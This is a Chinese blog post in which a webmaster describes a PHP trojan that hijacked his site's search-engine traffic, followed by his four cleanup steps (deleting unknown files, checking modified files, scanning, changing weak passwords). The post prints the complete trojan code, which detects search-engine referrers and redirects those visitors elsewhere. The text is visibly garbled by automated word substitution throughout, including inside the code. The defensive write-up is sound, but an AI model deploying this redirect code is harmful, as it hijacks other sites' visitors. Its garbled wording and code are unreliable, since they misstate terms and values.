如果你的网站平时流量很年夜，PV很高，某一天PV却起头变少，除开反思网站内容，还要斟酌下网站是否中木马，其实很早以前便有致使搜索引擎流量转移的php木马，简单来讲便是如果拜候流量来自搜索引擎，那么自动取得对方网站的文件，从而让你的网站不被用户看到。

因为我的网站近期遭受到这样的抨击打击，所以正好分享下这段代码，希望对广年夜站长有所启示，特别是对用php法度建站的站长，仍是应该提防下这类抨击打击。依照汗青的情况来看，这样的木马很多见，似乎一年前甚至几年前便有，只是可能现在取得的效果没曩昔那么好。

下面是致使搜索引擎来路流量转移的抨击打击代码：

<?php

error_reporting(E_ERROR);

header('content-Type: text/html; charset=gb2312');

$come_from="百度#谷歌#soso#sogou#cache.百度#谷歌";

$referer = Split("#",$come_from) ;

foreach($referer as $v){

if(stristr($_SERVER['HTTP_REFERER'],$v))

{

Header("Location:".'.abc/3/nb.html?'.$_SERVER['SERVER_NAME']);

}

}

echo file_get_contents('.abc//xx/dn2.php');

?>

代码很简单，如果拜候来历是搜索引擎，那么会定位到下面所述的php文件及html文件，这样用户便没法取得预想的东西。当然，现在每个办事器的依照设置不一样，部分办事器即便是被上传此类文件，仍是限制执行的;不过，既然遇到问题，那么接下来便是要解决问题。

下面简单说说我的措置体例，希望对年夜家以后遇到近似的情况有所帮忙。

第一步自然是删除近似的php的文件，这类php文件没有固定的名字，不过都是在根目录，所以查找起来很便利，删除失落那些陌生的文件便可。删除以后不要冲动，先去别的目录查找下近似的陌生文件，看到陌生的文件后打开看看，有问题直接删除。

第二步是继续去看常常使用的系统php文件，看看这些文件是否近期被修悔改，如果被修悔改，那么下载下来，随后查找前面呈现的陌生php文件名，比如原来是呈现的dv.php，现在可以搜索下dv.php，看看会不会被修改成这样;别的便是，一般别的目录下还会有真正的木马。

第三步可以去360网站平安检测平台看看，上传文件验证通过便可起头测试网站是否平安;一般而言，如果网站被挂黑链或有不偏见的文字，城市有提示，所以仍是比较好用的。特别是对黑链检测，这点功能比较好，因为黑链一般都是隐藏的，站长自己很难想到的。

第四步是修改弱口令，非论是FTP账号密码，仍是网站后台地址，仍是网站后台登录名，仍是别的什么密码，如果感觉太弱了，比如只有七八位，那么建议修改得更难一点，很多网站被破解，都是弱口令被扫描到，加年夜密码长度对这类破解网站的提防仍是有帮忙的。

写到这里，这个故事根基上告一段落了，网站平安迫在眉睫，每时每刻我们都应该注意网站的平安问题，你不注意，那些挂黑链的人可会惦记上你的，只有不竭提升网站的平安才可以尽可能避免被黑。本文由爱不网（.aibue）站长原创，转载分享请注明，谢谢合作！